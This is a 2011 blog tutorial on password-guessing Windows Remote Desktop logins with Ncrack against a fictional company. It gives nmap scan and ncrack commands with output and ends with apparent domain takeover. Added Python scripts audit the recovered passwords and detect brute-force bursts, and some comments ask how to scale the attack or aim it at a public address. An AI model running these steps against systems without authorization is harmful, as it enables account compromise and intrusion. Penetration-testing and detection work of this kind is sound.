Remote desktop credentials audit with Ncrack

12 May 2011

DISCLAIMER
All information provided is for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). The tools and techniques demonstrated may be potentially damaging if used inappropriately. All characters and data written in this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we have already tried all the available remote attacks with no luck. We also tried ARP poisoning the LAN to capture user names and passwords, without succeeding. From a previous nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate this possibility further. First of all we need some valid usernames, so that we only have to guess the passwords rather than both. We found the names of the IT staff on various social networking websites. These are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine

It didn’t take long to create probable usernames following the common convention of the first letter of the first name followed by the entire surname:

jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine

Software required:

Linux machine, preferably Ubuntu.
nmap, the terminal server client and the build dependencies for Ncrack:

sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet. (From http://nmap.org/ncrack/)

Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack        # data directory the build is configured with (NCRACKDATADIR)
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall                         # run as root: builds a .deb instead of a bare 'make install'
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let’s find out which hosts in the network are up, and save them to a text list. The regular expression extracts only the IP addresses from the scan output.

Nmap ping scan: go no further than determining whether each host is online (newer Nmap releases call this option -sn; -sP is still accepted)

nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks

nmap -F -iL 192.168.56.0.txt


Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the Microsoft terminal service port (3389) open. Looking more closely at the services available on 192.168.56.10 (Kerberos on 88 and LDAP on 389 next to SMB), we can assume that this machine might be the domain controller, and it’s worth trying to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr

jtagle
jfeagins
hduchene
trestrepo
kmissildine

We also need a file (my.pwd) with candidate passwords; common-password wordlists are easy to find on the internet.

vim my.pwd

somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1

At this point we run Ncrack against the 192.168.56.10 machine (CL=1 limits Ncrack to one concurrent connection to the service).


ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and we were also able to crack the login credentials since they were using weak passwords. Four of the IT staff accounts are denied interactive logon on this machine; hduchene is not, and might be the domain administrator. Let’s find out.
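For the report that goes back to the client, the interesting output is not the list of credentials but which accounts need a reset and why. As an added example (not part of the original post, and not Ncrack’s own code), the script below parses the verbose run above, attaches the “denied interactive logon” notice to the credential it belongs to, and checks every recovered password against a Windows-style complexity rule. Two assumptions are made: the notice is taken to precede the credential line it refers to, which is how the post reads this run (hduchene is the one account without the restriction), and the policy thresholds (at least 8 characters, three of four character classes, username not contained in the password) are this example’s, not a policy stated on the page.

```python
"""Turn Ncrack's verbose RDP output into an account remediation report.

Added example for this page; not code from the post or from the Ncrack
project. Assumptions: the 'denied interactive logon' notice applies to the
'Discovered credentials' line that follows it, and the complexity thresholds
below are illustrative.
"""
import re

# Sample input: the verbose section of the Ncrack run shown in the post.
SAMPLE_NCRACK = """\
Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.
"""

# The my.pwd wordlist from the post.
WORDLIST = ("somepassword", "passw0rd", "blahblah", "12345678", "iloveyou", "trustno1")

DISCOVERED_RE = re.compile(
    r"^Discovered credentials on (?P<service>\w+)://(?P<host>[^:]+):(?P<port>\d+) "
    r"'(?P<user>[^']*)' '(?P<password>[^']*)'$")
DENIED_MARK = "denied interactive logon"

# Assumed policy thresholds (Windows "password must meet complexity
# requirements" asks for three of four character classes).
MIN_LENGTH = 8
MIN_CLASSES = 3
CLASS_PATTERNS = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]")


def parse_ncrack(text):
    """List of dicts (service, host, port, user, password, denied_interactive)."""
    findings = []
    pending_denied = False  # notice seen, waiting for the credential it refers to
    for line in text.splitlines():
        if DENIED_MARK in line:
            pending_denied = True
            continue
        m = DISCOVERED_RE.match(line)
        if m:
            finding = m.groupdict()
            finding["port"] = int(finding["port"])
            finding["denied_interactive"] = pending_denied
            findings.append(finding)
            pending_denied = False
    return findings


def policy_violations(user, password, wordlist=()):
    """Human-readable reasons the password fails the assumed policy."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    classes = sum(bool(re.search(p, password)) for p in CLASS_PATTERNS)
    if classes < MIN_CLASSES:
        problems.append("only %d of 4 character classes" % classes)
    if user and user.lower() in password.lower():
        problems.append("contains the username")
    if password in wordlist:
        problems.append("present in a common-password wordlist")
    return problems


def audit_report(text, wordlist=()):
    """Per-account remediation entries for every credential Ncrack recovered."""
    report = []
    for f in parse_ncrack(text):
        entry = dict(f)
        entry["violations"] = policy_violations(f["user"], f["password"], wordlist)
        entry["action"] = "reset password" + ("" if f["denied_interactive"]
                                              else "; review privileges (interactive logon allowed)")
        report.append(entry)
    return report


if __name__ == "__main__":
    for e in audit_report(SAMPLE_NCRACK, WORDLIST):
        print("%s@%s: %s [%s]" % (e["user"], e["host"], e["action"], "; ".join(e["violations"])))
```

Every one of the five recovered passwords fails the three-of-four class rule, which is the concrete form of the post’s closing remark about the missing password policy: the accounts were not unlucky, they were allowed to be weak.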

Run the terminal server client from the Linux box:

tsclient 192.168.56.10, log in with Hugh Duchene’s credentials ‘hduchene’ ‘passw0rd’ and BINGO!!!

At this point we have control of the entire MEGACORP domain, with unlimited access to all the corporate resources tied to it. We can add users, escalate the privileges of existing users, browse the protected network resources, install backdoors and rootkits, and much more.

Final remarks

For the penetration testers: don’t give up at the first hurdle, there’s always another way to break in :-) .

For the IT staff: the lack of a password policy enforcing complexity and strength leads to a disaster.
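The other half of the lesson for the IT staff is that a run like the one above is loud: with CL=1 the post’s Ncrack run sent 51 probes in 98 seconds, i.e. a failed logon every couple of seconds against one host from one source. As an added example (not part of the original post), the script below flags that pattern in Windows failed-logon events. The input is a constructed set of Security log records in a simplified CSV form (timestamp, event id, target user, source address, logon type); 4625 is “An account failed to log on” and logon type 10 is RemoteInteractive (RDP) on Vista/2008 and later, while hosts with Network Level Authentication enabled typically record the failure with logon type 3 instead, so both are matched. The source address 192.168.56.50, the threshold and the window are assumptions.

```python
"""Flag RDP password-guessing from Windows failed-logon events.

Added example for this page, not part of the original post. Input records are
constructed; the detection is a per-source sliding window over 4625 events
whose logon type is RemoteInteractive (10) or, with NLA, Network (3).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one burst of ten failures from 192.168.56.50 cycling
# through the post's five usernames (the shape of the Ncrack run), plus two
# isolated failures from 192.168.56.77 minutes apart (a user mistyping).
SAMPLE_EVENTS = """\
2011-05-10 17:20:30,4625,hduchene,192.168.56.77,10
2011-05-10 17:24:01,4625,jtagle,192.168.56.50,10
2011-05-10 17:24:03,4625,jfeagins,192.168.56.50,10
2011-05-10 17:24:05,4625,hduchene,192.168.56.50,10
2011-05-10 17:24:07,4625,trestrepo,192.168.56.50,10
2011-05-10 17:24:09,4625,kmissildine,192.168.56.50,10
2011-05-10 17:24:11,4625,jtagle,192.168.56.50,10
2011-05-10 17:24:13,4625,jfeagins,192.168.56.50,10
2011-05-10 17:24:15,4625,hduchene,192.168.56.50,10
2011-05-10 17:24:17,4625,trestrepo,192.168.56.50,10
2011-05-10 17:24:19,4625,kmissildine,192.168.56.50,10
2011-05-10 17:31:45,4625,hduchene,192.168.56.77,10
"""


def parse_events(text):
    """CSV lines -> list of dicts with a datetime 'time' field."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, source, logon_type = line.split(",")
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "event_id": int(event_id), "user": user,
                       "source": source, "logon_type": int(logon_type)})
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60),
                      rdp_logon_types=(10, 3)):
    """One alert per source address whose densest burst of RDP logon failures
    reaches `threshold` within `window`; distinct_users shows whether the
    burst hammered one account or cycled through many (spraying)."""
    by_source = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625 and e["logon_type"] in rdp_logon_types:
            by_source[e["source"]].append(e)

    alerts = []
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best["failures"]):
                burst = evs[start:end + 1]
                best = {"source": source, "failures": count,
                        "distinct_users": sorted({e["user"] for e in burst}),
                        "first": burst[0]["time"], "last": burst[-1]["time"]}
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_events(SAMPLE_EVENTS)):
        print("%s: %d RDP logon failures between %s and %s across %d accounts"
              % (a["source"], a["failures"], a["first"].time(), a["last"].time(),
                 len(a["distinct_users"])))
```

Five failures in a minute from one address, spread over five different accounts, is a guessing run and not a forgotten password; the same threshold is what an account-lockout policy would have applied on the domain controller, which is the cheapest mitigation alongside the password policy the post calls for and not exposing 3389/tcp more widely than needed.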


13 Comments on "Remote desktop credentials audit with Ncrack"

  1. Keith, 13/05/2011 at 7:56 am

    I tried this with ncrack on BackTrack 5 which is 0.3Alpha which gave me an error: Invalid service module: rdp

    I then tried to install ncrack 0.4Alpha in Ubuntu and get an error running make, it’s complaining about crypto stuff.

    Any ideas?

    Thanks

  2. pbailey, 13/05/2011 at 8:29 am

    Hi mate,

    Can you paste the error, crypto stuff is too generic.

    Best,
    Phillip

  3. Keith, 13/05/2011 at 8:40 am

    Thanks for the quick response Philip, here is the make output with the errors:

    ______________________________
    Compiling libnbase
    cd nbase && make
    make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase'
    make[1]: Nothing to be done for `all'.
    make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase'
    Compiling libnsock
    cd nsock/src && make
    make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/nsock/src'
    cd ../../nbase && make
    make[2]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase'
    make[2]: Nothing to be done for `all'.
    make[2]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase'
    make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/nsock/src'
    Compiling modules
    cd modules && make
    make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/modules'
    make[1]: Nothing to be done for `all'.
    make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/modules'
    make ncrack
    make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA'
    g++ -c -Inbase -Insock/include -Imodules -DHAVE_CONFIG_H -DNCRACK_NAME=\"Ncrack\" -DNCRACK_URL=\"http://ncrack.org\" -DNCRACK_PLATFORM=\"i686-pc-linux-gnu\" -DNCRACKDATADIR=\"/usr/local/share/ncrack\" -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -fno-strict-aliasing crypto.cc -o crypto.o
    crypto.cc: In function 'void deskey(unsigned char*, int)':
    crypto.cc:545:14: error: 'DE1' was not declared in this scope
    crypto.cc: In function 'void cookey(long unsigned int*)':
    crypto.cc:590:14: error: 'usekey' was not declared in this scope
    make[1]: *** [crypto.o] Error 1
    make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA'
    make: *** [all] Error 2
    ____________________________________________

  4. pbailey, 13/05/2011 at 11:36 am

    Hi Keith,

    You can try installing the missing crypto libs with the following command: apt-get install build-essential checkinstall libssl-dev libssh-dev

    Keep me updated.

    Phillip

  5. Keith, 13/05/2011 at 12:32 pm

    Hi Philip

    That did the trick, many thanks for your help and great post too by the way :-)

    Cheers
    Keith

  6. pbailey, 13/05/2011 at 12:58 pm

    I’m really glad that worked, the post is updated with the missing dependencies. Thanks again.

    phillip

  7. Erik, 27/05/2011 at 11:02 pm

    Hi, I have some issues when installing Ncrack, can you help me?
    -------------------------------------------------------------------
    g++ -c -Inbase -Insock/include -Imodules -DHAVE_CONFIG_H -DNCRACK_NAME=\"Ncrack\" -DNCRACK_URL=\"http://ncrack.org\" -DNCRACK_PLATFORM=\"i686-pc-linux-gnu\" -DNCRACKDATADIR=\"/usr/local/share/ncrack\" -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -fno-strict-aliasing crypto.cc -o crypto.o
    crypto.cc: In function 'void deskey(unsigned char*, int)':
    crypto.cc:545: error: 'DE1' was not declared in this scope
    crypto.cc: In function 'void cookey(long unsigned int*)':
    crypto.cc:590: error: 'usekey' was not declared in this scope
    make: *** [crypto.o] Error 1

    **** Installation failed. Aborting package creation.

    Restoring overwritten files from backup…OK

    Cleaning up…OK

    Bye.

  8. VerSprite, 28/07/2011 at 11:04 am

    Hey

    Just wanted to reiterate the thanks on the suggestions for installing the crypto libs. The aforementioned suggestion worked for me as well when confronted with the same error.

    VS

  9. anarchist, 05/09/2011 at 12:21 am

    Very informative, thanks a lot.
    I've been searching the net for a good ncrack tutorial.

    Only thing is how can I use lists for it like:
    127.0.0.1
    98.2.3.1

    to brute-force multiple IP addresses, and also lists for user names and passwords.
    That would be really neat.
    Can anyone help please?

  10. seun, 18/09/2011 at 8:09 pm

    Hello, I am having a problem with ncrack, it gives the error message below:
    "root@famous-compaq-nx9040-EE142PA-ABJ:~/ncrack-0.4ALPHA# ncrack -vv -U my.usr -P my.pwd 91.197.250.26:3389,CL=1
    No command 'ncrack' found, did you mean:
    Command 'lcrack' from package 'lcrack' (universe)
    ncrack: command not found
    root@famous-compaq-nx9040-EE142PA-ABJ:~/ncrack-0.4ALPHA#"

    Did you compile Ncrack yourself?

    Phillip

    Help me out

  11. Gago, 06/03/2012 at 12:27 am

    [root@bio-engine opensshlib]# apt-get install build-essential checkinstall libssl-dev libssh-dev
    I get the same error:

    [root@bio-engine opensshlib]# apt-get install build-essential checkinstall libssl-dev libssh-dev

    -bash: apt-get: command not found

  12. Dan, 21/03/2012 at 2:49 am

    It didn't work. Maybe it worked in 2011.

  13. shroud, 22/03/2012 at 10:03 pm

    Excellent tutorial.
